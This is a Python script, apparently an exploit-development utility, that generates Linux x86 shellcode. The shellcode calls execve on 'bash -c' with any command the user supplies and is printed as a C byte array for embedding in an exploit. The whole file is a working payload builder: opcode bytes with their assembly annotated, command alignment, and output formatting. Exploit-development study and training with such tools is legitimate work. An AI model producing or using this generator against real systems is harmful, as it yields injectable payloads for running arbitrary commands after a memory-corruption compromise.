#!/usr/bin/python3
'''
Jean-Pierre LESUEUR
@DarkCoderSc
jplesueur@phrozen.io
https://www.phrozen.io
'''
import sys
from textwrap import wrap
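def fail(message):
    """Print *message* on stdout with a red ``[KO]`` tag."""
    print("[\033[31mKO\033[39m] " + message)


def success(message):
    """Print *message* on stdout with a green ``[OK]`` tag."""
    print("[\033[32mOK\033[39m] " + message)


# Fixed part of the stub: builds "///bin//bash\0" and "-c\0" on the stack and
# leaves ebx -> "///bin//bash", edx -> "-c", eax = 0 and a NUL on top of the
# stack that will terminate the command string pushed right after it.
# Linux/x86 (32-bit) only: the epilogue issues int 0x80 with eax = 0xb (execve).
# None of these bytes is 0x00.
_PROLOGUE = (
    b"\x31\xc0"              # xor eax, eax
    b"\x50"                  # push eax          ; NUL terminator of "///bin//bash"
    b"\x68\x62\x61\x73\x68"  # push 0x68736162   ; "bash"
    b"\x68\x69\x6e\x2f\x2f"  # push 0x2f2f6e69   ; "in//"
    b"\x68\x2f\x2f\x2f\x62"  # push 0x622f2f2f   ; "///b"
    b"\x89\xe3"              # mov ebx, esp      ; ebx -> "///bin//bash"
    b"\x66\xb8\x2d\x63"      # mov ax, 0x632d    ; eax = "-c\0\0" (upper half already 0)
    b"\x50"                  # push eax
    b"\x31\xc0"              # xor eax, eax
    b"\x89\xe2"              # mov edx, esp      ; edx -> "-c"
    b"\x50"                  # push eax          ; NUL terminator of the command
)

# Builds argv = ["///bin//bash", "-c", <command>, NULL] and an empty envp,
# then calls execve.
_EPILOGUE = (
    b"\x89\xe6"  # mov esi, esp   ; esi -> <command>
    b"\x50"      # push eax       ; argv[3] = NULL
    b"\x56"      # push esi       ; argv[2] = <command>
    b"\x52"      # push edx       ; argv[1] = "-c"
    b"\x53"      # push ebx       ; argv[0] = "///bin//bash"
    b"\x89\xe1"  # mov ecx, esp   ; ecx -> argv
    b"\x50"      # push eax       ; envp[0] = NULL
    b"\x89\xe2"  # mov edx, esp   ; edx -> envp
    b"\xb0\x0b"  # mov al, 0xb    ; SYS_execve
    b"\xcd\x80"  # int 0x80
)


def align_command(command: str) -> str:
    """Return *command* left-padded with ``/`` to a multiple of 4 bytes.

    Each 4-byte chunk is emitted as one ``push imm32``, so the string has to
    be a multiple of 4.  The padding is prepended, which only stays harmless
    when the command starts with an absolute path (``//bin/sh`` resolves,
    ``/ls`` does not) -- see the warning in :func:`main`.
    """
    pad = -len(command) % 4
    return "/" * pad + command


def build_shellcode(command: str) -> bytes:
    """Return the raw execve("/bin//bash", ["/bin//bash", "-c", command]) stub.

    The command bytes are embedded verbatim; no bad-character filtering is
    done, so spaces (0x20), newlines (0x0a) etc. end up in the output as-is.

    Raises:
        UnicodeEncodeError: if *command* contains non-ASCII characters.
    """
    aligned = align_command(command).encode("ascii")
    # Push the last chunk first so the string reads forward in memory.
    pushes = b"".join(
        b"\x68" + aligned[offset:offset + 4]
        for offset in reversed(range(0, len(aligned), 4))
    )
    return _PROLOGUE + pushes + _EPILOGUE


def format_c_array(shellcode: bytes) -> str:
    """Render *shellcode* as a C ``unsigned char code[]`` literal, 16 bytes per line."""
    escaped = "".join("\\x{:02x}".format(byte) for byte in shellcode)
    body = "\n".join("\t\"{}\"".format(chunk) for chunk in wrap(escaped, 64))
    return "// Shellcode size = {}\nunsigned char code[] = \\\n{};".format(
        len(shellcode), body)


def main(argv: "list[str] | None" = None) -> None:
    """CLI entry point: ``execve-builder.py <command>``.

    Prints the C array on stdout; exits with status 1 on bad usage or a
    non-ASCII command.
    """
    args = sys.argv if argv is None else argv
    if len(args) != 2:
        prog = args[0] if args else "execve-builder.py"
        print("Usage: {} <command>".format(prog))
        sys.exit(1)
    command = args[1]

    # Alignment prepends '/' characters; a relative command name would then
    # fail to resolve inside bash -c.
    if len(command) % 4 and not command.startswith("/"):
        fail("command is padded with leading '/', which breaks a relative "
             "command name; use an absolute path (e.g. /bin/sh ...)")

    try:
        shellcode = build_shellcode(command)
    except UnicodeEncodeError:
        fail("command must be ASCII; non-ASCII characters cannot be embedded")
        sys.exit(1)

    success("Shellcode successfully generated, size={} Bytes.".format(len(shellcode)))
    print(format_c_array(shellcode))


if __name__ == "__main__":
    main()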